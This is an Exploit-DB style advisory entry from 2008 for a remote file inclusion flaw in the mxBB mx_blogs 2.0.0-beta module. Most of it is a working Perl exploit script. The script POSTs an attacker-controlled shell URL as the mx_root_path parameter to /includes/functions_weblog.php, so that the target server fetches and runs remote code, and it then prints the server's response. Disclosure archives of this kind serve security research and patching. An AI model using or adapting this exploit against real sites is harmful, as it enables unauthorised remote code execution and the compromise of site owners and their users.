mxBB Module mx_blogs 2.0.0-beta - Remote File Inclusion

EDB-ID:

5323

Author:

bd0rk

Type:

webapps

Platform:

PHP

Published:

2008-03-30

# mxBB Module mx_blogs 2.0.0-beta Remote File Include Exploit
#
# Vendor: http://www.mx-system.com
#
# Download: http://www.mx-system.com/index.php?page=4&action=file&file_id=405
#
# Vulncode in: /includes/functions_weblog.php line 24
#
# Greetz: str0ke, TheJT, rgod, Vallani, DNX, NBBN

use Getopt::Long;
use URI::Escape;
use IO::Socket;

$shellcode = "Insert the url to shell here";

main();

sub usage
{
print "\mxBB Module mx_blogs 2.0.0-beta Remote File Include Expl\n";
print "by bd0rk <www.soh-crew.it.tt>\n";
print "-t, --ttarget\t(someone.com)\n";
print "-f, --tshell\t(url to your shellcode)\n";
print "-d, --dir\t(/mx_blogs)\n";
exit;
}

sub main
{
GetOptions ('t|target=s' => \$target,'f|shell=s' => \$shell,'d|dir=s' => \$dir);
usage() unless $target;
$shellcode = $shell unless !$shell;
$url = uri_escape($shellcode);

$sock = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>"$target",PeerPort=>"80") or die "\nConnection() failed.\n";

print "\nConnected to ".$target.", injecting shellcode.\n";
$sendurl = "mx_root_path=".$url."";
$sendlen = length($sendurl);
print $sock "POST ".$dir."/includes/functions_weblog.php? HTTP/1.1\n";
print $sock "Host: ".$target."\n";
print $sock "Connection: close\n";
print $sock "Content-Type: application/x-www-form-urlencoded\n";
print $sock "Content-Length: ".$sendlen."\n\n";
print $sock $sendurl;
print "Attempted to include shellcode, Response:\n\n";
while($recvd = <$sock>)
{
print " ".$recvd."";
}
exit;
}

# milw0rm.com [2008-03-30]